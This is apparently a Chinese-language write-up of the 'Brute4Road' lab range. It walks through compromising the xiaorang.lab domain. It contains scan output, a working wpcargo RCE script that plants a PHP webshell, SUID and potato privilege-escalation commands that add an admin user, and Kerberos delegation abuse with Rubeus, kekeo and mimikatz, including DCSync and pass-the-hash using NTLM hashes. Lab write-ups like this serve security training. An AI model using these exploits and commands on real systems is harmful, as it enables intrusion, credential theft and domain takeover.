Brute4Road Writeup

外网信息收集

D:\桌面\信息收集\fscan2>fscan.exe -h 39.99.138.28

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 39.99.138.28:22
[+] 端口开放 39.99.138.28:21
[+] 端口开放 39.99.138.28:80
[+] 端口开放 39.99.138.28:6379
[+] 存活端口数量: 4
[*] 开始漏洞扫描...
[+] Redis扫描模块开始...
[*] 网站标题 http://39.99.138.28       状态码:200 长度:4833   标题:Welcome to CentOS
[+] ftp 39.99.138.28:21:anonymous
   [->]pub
[+] Redis 39.99.138.28:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[!] 扫描错误 39.99.138.28:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 4/4
[*] 扫描结束,耗时: 12.92017s

Redis未授权

主从复制Rce

注：主从复制Rce没有那么好打，如果失败一次就必需重启靶机！

flag01

python -c 'import pty;pty.spawn("/bin/bash")'

获取交互式终端

suid提权

$ find / -user root -perm -4000 -print 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1

内网渗透

隧道搭建+流量代理将流量带出来

内网信息收集

[redis@centos-web01 tmp]$ ./fscan -h 172.22.2.1/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.3      is alive
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.18     is alive
(icmp) Target 172.22.2.34     is alive
[*] Icmp alive hosts len is: 5
172.22.2.3:88 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.18:80 open
172.22.2.16:80 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.16:445 open
172.22.2.18:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.18:139 open
172.22.2.3:139 open
172.22.2.16:139 open
172.22.2.34:135 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.7:6379 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo 
[*]172.22.2.16
   [->]MSSQLSERVER
   [->]172.22.2.16
[*] NetInfo 
[*]172.22.2.3
   [->]DC
   [->]172.22.2.3
[*] WebTitle http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] NetInfo 
[*]172.22.2.34
   [->]CLIENT01
   [->]172.22.2.34
[*] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[*] WebTitle http://172.22.2.16        code:404 len:315    title:Not Found
[*] NetBios 172.22.2.3      [+] DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[*] OsInfo 172.22.2.3   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[+] ftp 172.22.2.7:21:anonymous 
   [->]pub
[*] WebTitle http://172.22.2.18        code:200 len:57738  title:又一个WordPress站点
已完成 20/20
[*] 扫描结束,耗时: 12.942671303s

WordPress：wpcargo Rce

┌──(root㉿kali)-[/home/hey/Desktop]
└─# proxychains wpscan --url http://172.22.2.18
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK
[+] URL: http://172.22.2.18/ [172.22.2.18]
[+] Started: Wed Mar  5 15:31:25 2025

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK
Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.22.2.18/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
 | Found By: Rss Generator (Passive Detection)
 |  - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
 |  - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>

[+] WordPress theme in use: twentytwentytwo
 | Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
 | [!] The version is out of date, the latest version is 1.9
 | Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
 | Style Name: Twenty Twenty-Two
 | Style URI: https://wordpress.org/themes/twentytwentytwo/
 | Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wpcargo
 | Location: http://172.22.2.18/wp-content/plugins/wpcargo/
 | Last Updated: 2024-08-08T17:00:00.000Z
 | [!] The version is out of date, the latest version is 7.0.6
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 6.x.x (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK                                                                                                                          > (0 / 137)  0.00%  ETA: ??:??:??
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK                                                                                                                         > (15 / 137) 10.94%  ETA: 00:00:10
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.2.18:80  ...  OK====                                                                                                                     > (38 / 137) 27.73%  ETA: 00:00:04
 Checking Config Backups - Time: 00:00:03 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar  5 15:31:41 2025
[+] Requests Done: 158
[+] Cached Requests: 19
[+] Data Sent: 40.023 KB
[+] Data Received: 127.852 KB
[+] Memory used: 261.609 MB
[+] Elapsed time: 00:00:15

poc

import sys
import binascii
import requests
 
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
 
def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')
 
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
 
destination_url = 'http://172.22.2.18'
cmd = 'ls'
 
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
 
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

WordPress配置存在敏感信息泄露

flag02

泄露数据库敏感信息，直接连接

受控机器凭据收集

再次拿到一台机器后需要做的还是信息收集，主要收集各类凭据；为下一步的横向移动做准备

发现存在大量密码，dump下来之后作为密码本对内网机器进行密码喷洒。

密码喷洒

使用上述构造的密码本对内网机器进行喷洒

Mssql存在口令复用

BadPotato提权

Add user and Rdp：

flag03

C:/Users/Public/sweetpotato.exe -a "net user hey qwer1234! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators hey /add"
mstsc /admin /v:172.22.2.16:3389

域内渗透

存在域xiaorang.lab

既然有域，那么此时我们可以使用BloodHound进行域内的信息收集：

BloodHound Analysis

Find Shortest Paths to Domain Admins

寻找到域管理员的最短路径

这个时候显示了如何从普通用户到域管计算机的最短路径

Shortest Paths to Unconstrained Delegation Systems

查询到非约束委派系统的最短路径：无约束委派的机器可以在身份验证时缓存用户的 Kerberos 票据，因此攻击者如果能控制这些机器，就可能伪造高权限用户的身份进行攻击。

攻击路径

第一步：找出可以利用的计算机

MSSQLSERVER.XIAORANG.LAB是一个关键节点，因为它：

1. 被多个高权限组管理（如 ADMINISTRATORS@XIAORANG.LAB）。
2. 能被远程桌面访问（CanRDP）。
3. 它可能有“无约束委派”功能，这意味着如果某个高权限用户登录到这台机器，他们的 Kerberos 票据会被存储。

第二步：劫持高权限票据

假设攻击者控制了 MSSQLSERVER.XIAORANG.LAB：

1. 等待高权限用户（如域管）登录：如果 DOMAIN ADMINS@XIAORANG.LAB 或 ENTERPRISE ADMINS@XIAORANG.LAB 登录到 MSSQL 服务器，他们的 Kerberos 票据会自动存储在该机器上。
2. 利用 Kerberos 票据伪造攻击（Pass-the-Ticket）：通过工具（如 Mimikatz）提取高权限用户的票据，然后伪装成该用户访问域控 DC.XIAORANG.LAB。

第三步：完全控制 AD

一旦攻击者能够伪装成域管访问 DC.XIAORANG.LAB，就可以：添加新用户到 DOMAIN ADMINS 组、关闭安全策略、部署持久化后门等…

Shorts Paths to AD

此时我们也知道该主机存在约束委派

约束委派攻击

查看约束委派

BadPotato.exe cmd /c "AdFind.exe -b \"DC=xiaorang,DC=lab\" -f \"(&(samAccountType=805306369)(msds-allowedtodelegateto=*))\" msds-allowedtodelegateto"

# 查询域内非约束性委派的计算机
AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

# 查询非约束性委派的服务账号
AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

打法一：S4U2Self

申请机器账户MSSQLSERVER的TGT

使用Rubeus申请访问自身的可转发服务票据

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:cea3e66a2715c71423e7d3f0ff6cd352 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

S4U 伪造高权限 ST

通过Rubeus的S4U2Self协议代表域管理员申请针对域控LDAP服务的票据并注入内存，即为使用 S4U2Self 扩展代表域管理员 Administrator 请求针对域控 LDAP 服务的票据，并将得到的票据传递到内存中。

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:

导出域内用户的Hash

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

WMI横向移动

python wmiexec.py -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3

打法二：TGS票据传递

mimikatz导出MSSQLSERVER的票据

privilege::debug
sekurlsa::tickets /export
exit

kekeo申请票据

tgs::s4u /tgt:[0;3e4]-2-1-40e10000-MSSQLSERVER$@krbtgt-XIAORANG.LAB.kirbi /user:Administrator@XIAORANG.LAB /service:cifs/DC.XIAORANG.LAB 
exit

ptt

mimikatz.exe "kerberos::ptt TGS_Administrator@XIAORANG.LAB@XIAORANG.LAB_cifs~DC.XIAORANG.LAB@XIAORANG.LAB.kirbi" "exit"

flag04